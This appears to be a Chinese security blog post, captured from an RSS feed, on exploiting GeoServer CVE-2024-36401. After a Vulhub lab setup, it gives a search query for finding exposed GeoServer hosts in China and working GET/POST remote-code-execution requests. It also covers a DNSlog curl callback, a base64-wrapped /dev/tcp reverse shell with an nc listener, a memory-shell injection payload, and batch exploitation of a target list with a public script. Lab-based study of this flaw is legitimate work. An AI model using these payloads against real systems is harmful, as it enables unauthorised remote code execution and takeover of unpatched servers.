Geoserver on 静静的安全笔记https://ruajingjing.top/tags/geoserver/Recent content in Geoserver on 静静的安全笔记Hugo -- gohugo.iozh-CNTue, 13 Aug 2024 15:02:58 +0000GeoServer CVE-2024-36401 漏洞利用https://ruajingjing.top/post/geoserver-cve-2024-36401-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/Tue, 13 Aug 2024 15:02:58 +0000https://ruajingjing.top/post/geoserver-cve-2024-36401-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/<img src="https://ruajingjing.top/" alt="Featured image of post GeoServer CVE-2024-36401 漏洞利用" /><h2 id="搜索语法">搜索语法 </h2><p>app.name=&ldquo;GeoServer&rdquo; and ip.country=&ldquo;CN&rdquo; and icp.is_exception=&ldquo;true&rdquo;</p> <h2 id="版本属性">版本属性 </h2><p>在GeoServer 2.25.1, 2.24.3, 2.23.5版本及以前,未登录的任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。</p> <h2 id="靶场环境">靶场环境 </h2><p>建议开一个美国区的云服务器,拉取GitHub和Vulhub方便。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">git clone https://github.com/vulhub/vulhub.git </span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="nb">cd</span> vulhub/ </span></span><span class="line"><span class="ln">3</span><span class="cl"><span class="nb">cd</span> geoserver/CVE-2024-36401/ </span></span><span class="line"><span class="ln">4</span><span class="cl">docker-compose up -d </span></span></code></pre></div><p>访问 <code>http://your-ip:8080/geoserver</code> 查看到GeoServer的默认页面。</p> <p><img alt="1723450106639" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723450106639.png"></p> <h2 id="poc">POC </h2><h3 id="get方法的poc">GET方法的POC </h3><p><img alt="1723450435176" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723450435176.png"></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">GET /geoserver/wfs?service<span class="o">=</span>WFS<span class="p">&amp;</span><span class="nv">version</span><span class="o">=</span>2.0.0<span class="p">&amp;</span><span class="nv">request</span><span class="o">=</span>GetPropertyValue<span class="p">&amp;</span><span class="nv">typeNames</span><span class="o">=</span>sf:archsites<span class="p">&amp;</span><span class="nv">valueReference</span><span class="o">=</span>exec<span class="o">(</span>java.lang.Runtime.getRuntime<span class="o">()</span>,<span class="s1">&#39;touch%20/tmp/success1&#39;</span><span class="o">)</span> HTTP/1.1 </span></span><span class="line"><span class="ln">2</span><span class="cl">Host: your-ip:8080 </span></span><span class="line"><span class="ln">3</span><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="ln">4</span><span class="cl">Accept: */* </span></span><span class="line"><span class="ln">5</span><span class="cl">Accept-Language: en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="ln">6</span><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>Windows NT 10.0<span class="p">;</span> Win64<span class="p">;</span> x64<span class="o">)</span> AppleWebKit/537.36 <span class="o">(</span>KHTML, like Gecko<span class="o">)</span> Chrome/124.0.6367.118 Safari/537.36 </span></span><span class="line"><span class="ln">7</span><span class="cl">Connection: close </span></span><span class="line"><span class="ln">8</span><span class="cl">Cache-Control: max-age<span class="o">=</span><span class="m">0</span> </span></span></code></pre></div><p><img alt="1723450389978" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723450389978.png"></p> <p>进入容器查看,可以看到成功创建文件。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl">docker <span class="nb">exec</span> -it cve-2024-36401_web_1 /bin/bash </span></span><span class="line"><span class="ln">2</span><span class="cl">ls /tmp </span></span></code></pre></div><h3 id="基于post方法的poc">基于POST方法的POC </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="ln"> 1</span><span class="cl">POST /geoserver/wfs HTTP/1.1 </span></span><span class="line"><span class="ln"> 2</span><span class="cl">Host: your-ip:8080 </span></span><span class="line"><span class="ln"> 3</span><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="ln"> 4</span><span class="cl">Accept: */* </span></span><span class="line"><span class="ln"> 5</span><span class="cl">Accept-Language: en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="ln"> 6</span><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>Windows NT 10.0<span class="p">;</span> Win64<span class="p">;</span> x64<span class="o">)</span> AppleWebKit/537.36 <span class="o">(</span>KHTML, like Gecko<span class="o">)</span> Chrome/124.0.6367.118 Safari/537.36 </span></span><span class="line"><span class="ln"> 7</span><span class="cl">Connection: close </span></span><span class="line"><span class="ln"> 8</span><span class="cl">Cache-Control: max-age<span class="o">=</span><span class="m">0</span> </span></span><span class="line"><span class="ln"> 9</span><span class="cl">Content-Type: application/xml </span></span><span class="line"><span class="ln">10</span><span class="cl">Content-Length: <span class="m">356</span> </span></span><span class="line"><span class="ln">11</span><span class="cl"> </span></span><span class="line"><span class="ln">12</span><span class="cl">&lt;wfs:GetPropertyValue <span class="nv">service</span><span class="o">=</span><span class="s1">&#39;WFS&#39;</span> <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;2.0.0&#39;</span> </span></span><span class="line"><span class="ln">13</span><span class="cl"> xmlns:topp<span class="o">=</span><span class="s1">&#39;http://www.openplans.org/topp&#39;</span> </span></span><span class="line"><span class="ln">14</span><span class="cl"> xmlns:fes<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/fes/2.0&#39;</span> </span></span><span class="line"><span class="ln">15</span><span class="cl"> xmlns:wfs<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/wfs/2.0&#39;</span>&gt; </span></span><span class="line"><span class="ln">16</span><span class="cl"> &lt;wfs:Query <span class="nv">typeNames</span><span class="o">=</span><span class="s1">&#39;sf:archsites&#39;</span>/&gt; </span></span><span class="line"><span class="ln">17</span><span class="cl"> &lt;wfs:valueReference&gt;exec<span class="o">(</span>java.lang.Runtime.getRuntime<span class="o">()</span>,<span class="s1">&#39;touch /tmp/success2&#39;</span><span class="o">)</span>&lt;/wfs:valueReference&gt; </span></span><span class="line"><span class="ln">18</span><span class="cl">&lt;/wfs:GetPropertyValue&gt; </span></span></code></pre></div><p><img alt="1723450793264" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723450793264.png"></p> <p><img alt="1723450809382" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723450809382.png"></p> <p>只有 <code>ows:ExceptionReport java.lang.ClassCastException:</code> 的报错是成功执行的。</p> <p>值得注意的是,typeNames必须存在,我们可以在Web页面中找到当前服务器中的所有Types</p> <h3 id="dns-反弹测试">DNS 反弹测试 </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="ln"> 1</span><span class="cl">POST /geoserver/wfs HTTP/1.1 </span></span><span class="line"><span class="ln"> 2</span><span class="cl">Host:47.251.97.142:8080 </span></span><span class="line"><span class="ln"> 3</span><span class="cl">Accept-Encoding:gzip,deflate,br </span></span><span class="line"><span class="ln"> 4</span><span class="cl">Accept:*/* </span></span><span class="line"><span class="ln"> 5</span><span class="cl">Accept-Language:en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="ln"> 6</span><span class="cl">User-Agent:Mozilla/5.0<span class="o">(</span>WindowsNT10.0<span class="p">;</span>Win64<span class="p">;</span>x64<span class="o">)</span>AppleWebKit/537.36<span class="o">(</span>KHTML,likeGecko<span class="o">)</span>Chrome/124.0.6367.118Safari/537.36 </span></span><span class="line"><span class="ln"> 7</span><span class="cl">Connection:close </span></span><span class="line"><span class="ln"> 8</span><span class="cl">Cache-Control:max-age<span class="o">=</span><span class="m">0</span> </span></span><span class="line"><span class="ln"> 9</span><span class="cl">Content-Type:application/xml </span></span><span class="line"><span class="ln">10</span><span class="cl">Content-Length: <span class="m">358</span> </span></span><span class="line"><span class="ln">11</span><span class="cl"> </span></span><span class="line"><span class="ln">12</span><span class="cl">&lt;wfs:GetPropertyValue <span class="nv">service</span><span class="o">=</span><span class="s1">&#39;WFS&#39;</span> <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;2.0.0&#39;</span> </span></span><span class="line"><span class="ln">13</span><span class="cl"> xmlns:topp<span class="o">=</span><span class="s1">&#39;http://www.openplans.org/topp&#39;</span> </span></span><span class="line"><span class="ln">14</span><span class="cl"> xmlns:fes<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/fes/2.0&#39;</span> </span></span><span class="line"><span class="ln">15</span><span class="cl"> xmlns:wfs<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/wfs/2.0&#39;</span>&gt; </span></span><span class="line"><span class="ln">16</span><span class="cl"> &lt;wfs:Query <span class="nv">typeNames</span><span class="o">=</span><span class="s1">&#39;sf:archsites&#39;</span>/&gt; </span></span><span class="line"><span class="ln">17</span><span class="cl"> &lt;wfs:valueReference&gt;exec<span class="o">(</span>java.lang.Runtime.getRuntime<span class="o">()</span>,<span class="s1">&#39;curl 5s1mc4.dnslog.cn&#39;</span><span class="o">)</span>&lt;/wfs:valueReference&gt; </span></span><span class="line"><span class="ln">18</span><span class="cl">&lt;/wfs:GetPropertyValue&gt; </span></span></code></pre></div><p><img alt="1723530166465" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723530166465.png"></p> <h2 id="武器化利用">武器化利用 </h2><h3 id="反弹shell">反弹Shell </h3><p><a class="link" href="https://www.ddosi.org/shell/" target="_blank" rel="noopener" >反弹shell在线生成器</a> 在线生成一句话反弹命令</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln">1</span><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;sh -i &gt;&amp; /dev/tcp/攻击机ip/攻击机端口 0&gt;&amp;1&#34;</span> <span class="p">|</span>base64 </span></span><span class="line"><span class="ln">2</span><span class="cl">nc -lvnp <span class="m">7777</span> <span class="c1"># 攻击机开启监听端口</span> </span></span></code></pre></div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="ln"> 1</span><span class="cl">POST /geoserver/wfs HTTP/1.1 </span></span><span class="line"><span class="ln"> 2</span><span class="cl">Host:47.251.97.142:8080 </span></span><span class="line"><span class="ln"> 3</span><span class="cl">Accept-Encoding:gzip,deflate,br </span></span><span class="line"><span class="ln"> 4</span><span class="cl">Accept:*/* </span></span><span class="line"><span class="ln"> 5</span><span class="cl">Accept-Language:en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="ln"> 6</span><span class="cl">User-Agent:Mozilla/5.0<span class="o">(</span>WindowsNT10.0<span class="p">;</span>Win64<span class="p">;</span>x64<span class="o">)</span>AppleWebKit/537.36<span class="o">(</span>KHTML,likeGecko<span class="o">)</span>Chrome/124.0.6367.118Safari/537.36 </span></span><span class="line"><span class="ln"> 7</span><span class="cl">Connection:close </span></span><span class="line"><span class="ln"> 8</span><span class="cl">Cache-Control:max-age<span class="o">=</span><span class="m">0</span> </span></span><span class="line"><span class="ln"> 9</span><span class="cl">Content-Type:application/xml </span></span><span class="line"><span class="ln">10</span><span class="cl">Content-Length: <span class="m">432</span> </span></span><span class="line"><span class="ln">11</span><span class="cl"> </span></span><span class="line"><span class="ln">12</span><span class="cl">&lt;wfs:GetPropertyValue <span class="nv">service</span><span class="o">=</span><span class="s1">&#39;WFS&#39;</span> <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;2.0.0&#39;</span> </span></span><span class="line"><span class="ln">13</span><span class="cl"> xmlns:topp<span class="o">=</span><span class="s1">&#39;http://www.openplans.org/topp&#39;</span> </span></span><span class="line"><span class="ln">14</span><span class="cl"> xmlns:fes<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/fes/2.0&#39;</span> </span></span><span class="line"><span class="ln">15</span><span class="cl"> xmlns:wfs<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/wfs/2.0&#39;</span>&gt; </span></span><span class="line"><span class="ln">16</span><span class="cl"> &lt;wfs:Query <span class="nv">typeNames</span><span class="o">=</span><span class="s1">&#39;sf:archsites&#39;</span>/&gt; </span></span><span class="line"><span class="ln">17</span><span class="cl"> &lt;wfs:valueReference&gt;exec<span class="o">(</span>java.lang.Runtime.getRuntime<span class="o">()</span>,<span class="s1">&#39;bash -c {echo,反弹的base64编码}|{base64,-d}|{bash,-i}&#39;</span><span class="o">)</span>&lt;/wfs:valueReference&gt; </span></span><span class="line"><span class="ln">18</span><span class="cl">&lt;/wfs:GetPropertyValue&gt; </span></span></code></pre></div><p>注意 <code>Content-Length:357</code> 中数字的长度要和命令的字节数等于或大于才能执行成功,越大执行越慢。</p> <p><img alt="1723518872795" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723518872795.png"></p> <p><img alt="1723523150475" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723523150475.png"></p> <h3 id="注入内存木马">注入内存木马 </h3><p><img alt="1723452618835" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723452618835.png"></p> <p>使用JMG工具生成内存马,注意名写 <code>java.lang.tes</code>,自定义密码密钥点击生成。把输出复制到下面的POC里 <code>str=&quot;内存马base64&quot;;</code>的位置。</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="ln"> 1</span><span class="cl">POST /geoserver/wfs HTTP/1.1 </span></span><span class="line"><span class="ln"> 2</span><span class="cl">Host: 47.251.97.142:8080 </span></span><span class="line"><span class="ln"> 3</span><span class="cl">Accept-Encoding: gzip,deflate,br </span></span><span class="line"><span class="ln"> 4</span><span class="cl">Accept: */* </span></span><span class="line"><span class="ln"> 5</span><span class="cl">Accept-Language:en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="ln"> 6</span><span class="cl">User-Agent: Mozilla/5.0<span class="o">(</span>WindowsNT10.0<span class="p">;</span>Win64<span class="p">;</span>x64<span class="o">)</span>AppleWebKit/537.36<span class="o">(</span>KHTML,likeGecko<span class="o">)</span>Chrome/124.0.6367.118Safari/537.36 </span></span><span class="line"><span class="ln"> 7</span><span class="cl">Connection: close </span></span><span class="line"><span class="ln"> 8</span><span class="cl">Cache-Control: max-age<span class="o">=</span><span class="m">0</span> </span></span><span class="line"><span class="ln"> 9</span><span class="cl">Content-Type: application/xml </span></span><span class="line"><span class="ln">10</span><span class="cl">Content-Length: <span class="m">432</span> </span></span><span class="line"><span class="ln">11</span><span class="cl"> </span></span><span class="line"><span class="ln">12</span><span class="cl">&lt;wfs:GetPropertyValue <span class="nv">service</span><span class="o">=</span><span class="s1">&#39;WFS&#39;</span> <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;2.0.0&#39;</span> </span></span><span class="line"><span class="ln">13</span><span class="cl"> xmlns:topp<span class="o">=</span><span class="s1">&#39;http://www.openplans.org/topp&#39;</span> </span></span><span class="line"><span class="ln">14</span><span class="cl"> xmlns:fes<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/fes/2.0&#39;</span> </span></span><span class="line"><span class="ln">15</span><span class="cl"> xmlns:wfs<span class="o">=</span><span class="s1">&#39;http://www.opengis.net/wfs/2.0&#39;</span>&gt; </span></span><span class="line"><span class="ln">16</span><span class="cl"> &lt;wfs:Query <span class="nv">typeNames</span><span class="o">=</span><span class="s1">&#39;sf:archsites&#39;</span>/&gt; </span></span><span class="line"><span class="ln">17</span><span class="cl"> &lt;wfs:valueReference&gt;eval<span class="o">(</span>getEngineByName<span class="o">(</span>javax.script.ScriptEngineManager.new<span class="o">()</span>,<span class="s1">&#39;js&#39;</span><span class="o">)</span>,<span class="s1">&#39; </span></span></span><span class="line"><span class="ln">18</span><span class="cl"><span class="s1">var str=&#34;&#34;; </span></span></span><span class="line"><span class="ln">19</span><span class="cl"><span class="s1">var bt; </span></span></span><span class="line"><span class="ln">20</span><span class="cl"><span class="s1">try { </span></span></span><span class="line"><span class="ln">21</span><span class="cl"><span class="s1"> bt = java.lang.Class.forName(&#34;sun.misc.BASE64Decoder&#34;).newInstance().decodeBuffer(str); </span></span></span><span class="line"><span class="ln">22</span><span class="cl"><span class="s1">} catch (e) { </span></span></span><span class="line"><span class="ln">23</span><span class="cl"><span class="s1"> bt = java.util.Base64.getDecoder().decode(str); </span></span></span><span class="line"><span class="ln">24</span><span class="cl"><span class="s1">} </span></span></span><span class="line"><span class="ln">25</span><span class="cl"><span class="s1">var theUnsafe = java.lang.Class.forName(&#34;sun.misc.Unsafe&#34;).getDeclaredField(&#34;theUnsafe&#34;); </span></span></span><span class="line"><span class="ln">26</span><span class="cl"><span class="s1">theUnsafe.setAccessible(true); </span></span></span><span class="line"><span class="ln">27</span><span class="cl"><span class="s1">unsafe = theUnsafe.get(null); </span></span></span><span class="line"><span class="ln">28</span><span class="cl"><span class="s1">unsafe.defineAnonymousClass(java.lang.Class.forName(&#34;java.lang.Class&#34;), bt, null).newInstance(); </span></span></span><span class="line"><span class="ln">29</span><span class="cl"><span class="s1">&#39;</span><span class="o">)</span>&lt;/wfs:valueReference&gt; </span></span><span class="line"><span class="ln">30</span><span class="cl">&lt;/wfs:GetPropertyValue&gt; </span></span></code></pre></div><p>POC有问题,不成功,建议使用反弹shell后再用别的工具建立探针控制。</p> <h3 id="工具批量监测">工具批量监测 </h3><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="ln">1</span><span class="cl">git clone https://mirror.ghproxy.com/https://github.com/RevoltSecurities/CVE-2024-36401.git </span></span><span class="line"><span class="ln">2</span><span class="cl"><span class="nb">cd</span> CVE-2024-36401/ </span></span><span class="line"><span class="ln">3</span><span class="cl">pip install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple some-package </span></span><span class="line"><span class="ln">4</span><span class="cl">python exploit.py -l geoserverip.txt </span></span></code></pre></div><p><img alt="1723517374299" loading="lazy" sizes="(max-width: 767px) calc(100vw - 30px), (max-width: 1023px) 700px, (max-width: 1279px) 950px, 1232px" src="https://newblogimg.oss-cn-beijing.aliyuncs.com/2024/2024070809/1723517374299.png"></p> <blockquote> <p>参考链接 <a class="link" href="https://mp.weixin.qq.com/s/h4oswTGGaxVBLXR_h7PT1Q" target="_blank" rel="noopener" >https://mp.weixin.qq.com/s/h4oswTGGaxVBLXR_h7PT1Q</a> <a class="link" href="https://cloud.tencent.com/developer/article/2437213" target="_blank" rel="noopener" >https://cloud.tencent.com/developer/article/2437213</a> <a class="link" href="https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md" target="_blank" rel="noopener" >https://github.com/vulhub/vulhub/blob/master/geoserver/CVE-2024-36401/README.zh-cn.md</a> <a class="link" href="https://github.com/pen4uin/java-memshell-generator" target="_blank" rel="noopener" >https://github.com/pen4uin/java-memshell-generator</a> <a class="link" href="https://xz.aliyun.com/t/14991?time__1311=GqAh0IqGxmxfx0v44%2BxCqqQwwbugt03x" target="_blank" rel="noopener" >https://xz.aliyun.com/t/14991?time__1311=GqAh0IqGxmxfx0v44%2BxCqqQwwbugt03x</a> <a class="link" href="https://github.com/RevoltSecurities/CVE-2024-36401" target="_blank" rel="noopener" >https://github.com/RevoltSecurities/CVE-2024-36401</a> <a class="link" href="https://yzddmr6.com/posts/geoserver-memoryshell/" target="_blank" rel="noopener" >https://yzddmr6.com/posts/geoserver-memoryshell/</a> <a class="link" href="https://cn-sec.com/archives/2997415.html" target="_blank" rel="noopener" >https://cn-sec.com/archives/2997415.html</a></p> </blockquote>